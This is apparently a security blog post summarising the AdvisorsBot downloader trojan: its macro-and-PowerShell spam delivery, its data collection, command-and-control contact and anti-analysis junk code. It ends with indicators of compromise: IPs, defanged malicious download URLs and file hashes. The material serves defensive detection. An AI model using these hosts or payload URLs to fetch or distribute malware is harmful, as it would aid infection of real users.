AdvisorsBot Downloader

Security researchers have discovered a new C-based downloader trojan known as AdvisorsBot targeting governmental, telecommunications and leisure organisations.

AdvisorsBot is being distributed through large-scale spam campaigns using several different lure documents. These documents contain malicious macros that execute a PowerShell script to download and install AdvisorsBot.

Once installed, AdvisorsBot has much of the same functionality as the Marap downloader, including collecting user and system information before connecting to a command and control server.

An alternate version of AdvisorsBot, known as PoshAdvisor, also exists. Rewritten in PowerShell and .NET, it has the same functionality as AdvisorsBot.

Like most modern malware, AdvisorsBot employs a number of anti-analysis features. One of the most effective is the use of junk code–such as extra instructions, conditional statements, and loops–to considerably slow down reverse engineering.

Read a full report on this here

Indicators Of Compromise

IP Addresses

  • 162.244.32[.]148
  • 185.180.198[.]56

URLs

  • 162.244.32.185/jquery[.]js
  • 204.155.31.167/bootstrap[.]css
  • chklink.us/upd[.]bin
  • finance-advisors-ca.bid/ldr[.]bin
  • interactive-investments[.]bid
  • investments-advisors[.]bid
  • real-estate-advisors[.]win
  • secur-real-estate[.]bid

SHA256 File Hashes

  • 1eb1ef64a9b41267e362597e071e181acb86b50e708ede4a9448689da7fb2425
  • 2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132
  • 335229e528c6348a3dc5941c434dc67acb031f297d9ac25e53a2a56d3df3e255
  • 34a2fc4eb718a8b13a44cfb851ccac6cf63e54fe7e7ab145a5bdeb6def2d4620
  • 6d73bea291bf6114af8333031187ac05fdfc8afe05025b272f510a6977b2153e
  • 956eae6395ed5e1b2d49ffa08ff85b42d1fc210531ab9c48c2d76e6ee38c9781
  • 9dd12d3a32d2ba133bac8747f872f649b389a9cf3f4baaa9fad69a43d2e4f982
  • c659b00a65a574a08fff64662581a8ecae7eafa38850a6c7c19b88c2085a1c03
  • ee32c4e0a4b345029d8b0f5c6534fa9fc41e795cc937d3f3fd743dcb0a1cea35
  • fdf5072b904ba9148d8b98e4ba01987e644449e2b10f033ca4d2f967dc502a58




Duncan Newell

Duncan is a technology professional with over 20 years experience of working in various IT roles. He has a interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: